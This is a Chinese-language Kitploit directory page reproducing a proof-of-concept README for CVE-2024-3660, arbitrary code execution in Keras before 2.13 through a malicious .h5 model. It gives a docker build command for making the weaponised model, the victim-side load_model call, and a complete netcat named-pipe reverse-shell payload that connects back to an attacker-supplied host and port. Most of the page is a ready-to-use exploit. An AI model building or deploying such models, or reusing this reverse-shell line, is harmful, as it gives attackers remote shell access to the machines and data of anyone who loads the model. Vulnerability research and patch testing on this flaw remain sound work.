Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-3660-PoC — CVE-2024-3660 的一个 PoC。Keras 中的任意代码执行。 | Kitploit
工具/GitHubGitHub/aaryanbhujang/cve-2024-3660-poc
漏洞分析漏洞利用渗透测试Payload 开发AI 安全二进制利用
GitHubaaryanbhujang/cve-2024-3660-poc

CVE-2024-3660-PoC

CVE-2024-3660 的一个 PoC。Keras 中的任意代码执行。

查看仓库
41151年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-3660 – 通过恶意模型在TensorFlow Keras中执行任意代码

概述

CVE-2024-3660 是 TensorFlow 的 Keras 框架中的一个任意代码执行漏洞,影响版本 < 2.13。
攻击者可以在模型(例如通过 Lambda 层)中嵌入 Python 代码,该代码在加载模型时 自动执行。

当在易受攻击的环境中加载恶意的 .h5 模型文件时,任意命令将以 与加载进程相同的权限 执行。


受影响版本

  • TensorFlow 的 Keras < 2.13.0
  • 通过以下方式加载的 Keras 模型:
    tf.keras.models.load_model("CVE20243660.h5", compile=False)
    

或在不默认启用 safe_mode 的旧版 TensorFlow 中。

PoC 描述

本 PoC 使用基于 Docker 的构建,生成一个包含反向 Shell 有效载荷的恶意 hack.h5 模型。 当在易受攻击的 TensorFlow 版本中加载该模型时,它会回连至攻击者的机器。

使用方法

1. 构建并提取恶意模型

docker buildx build \
  --platform linux/amd64 \
  --build-arg LHOST=<YOUR-IP> \
  --build-arg LPORT=<YOUR-PORT> \
  -t tfimg . && \
container_id=$(docker create tfimg) && \
docker cp $container_id:/CVE20243660/CVE20243660.h5 ./CVE20243660.h5 && \
docker rm $container_id

2. 加载恶意模型(受害者端)

  • 在易受攻击的 TensorFlow 环境(< 2.13)中:
import tensorflow as tf
model = tf.keras.models.load_model("CVE20243660.h5", compile=False)

有效载荷

  • 嵌入的有效载荷使用 nc 实现反向 Shell:
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT >/tmp/f

参考

NVD CMU Oligo Security

下载工具